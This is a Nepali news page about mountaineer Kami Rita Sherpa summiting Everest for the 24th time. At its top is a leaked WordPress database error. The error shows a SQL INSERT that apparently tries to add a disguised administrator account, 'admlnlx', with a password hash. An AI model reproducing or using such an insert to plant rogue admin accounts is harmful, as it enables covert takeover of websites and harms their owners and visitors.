WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BNx.qKCF2ChZF.FdBc0k3MRwo.1Bks0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 16:13:35', '', 'admlnlx', 'admlnlx')

आफ्नै कीर्तिमान तोड्दै कामीरिता २४ औं पटक सगरमाथा शिखरमा – Gaule Khabar

आफ्नै कीर्तिमान तोड्दै कामीरिता २४ औं पटक सगरमाथा शिखरमा

आफ्नै कीर्तिमान तोड्दै कामीरिता २४ औं पटक सगरमाथा शिखरमा

गाउँले न्यूज, ७ जेष्ठ, सोलुखुम्बु । कीर्तिमानी आरोही खुम्बु पासाङल्यामु गाउपालिका ५ थामे गाउँका ४९ वर्षिय कामिरिता शेर्पाले एउटै सिजनमा २ पटक विश्वको सर्वोच्च शिखर सगरमाथा आरोहण गरी आफ्नै नाममा भएको कीर्तिमान सुधार गरेका हुन् ।
कामीरिता शेर्पाले २४ औं पटक सगरमाथा आरोहण गरेका छन् । उनले आज (मंलबार) बिहान ६ बजेर ३८ मिनेटमा सगरमाथाको शिखरमा पाइला टेकेको पर्यटन विभागका सम्पर्क अधिकृत ज्ञानेन्द्र श्रेष्ठले आधारशिविरबाट जानकारी दिए ।

गत साताको जेठ १ गते (बुधबार) उनले २३ औं पटक सगरमाथा आरोहण गरेका थिए । सेभेन समिट कम्पनीबाट आरोहण गरेका कामीरिताको लक्ष्य अर्को साल २५ औं पटक पुर्‍यौने रहेको छ ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका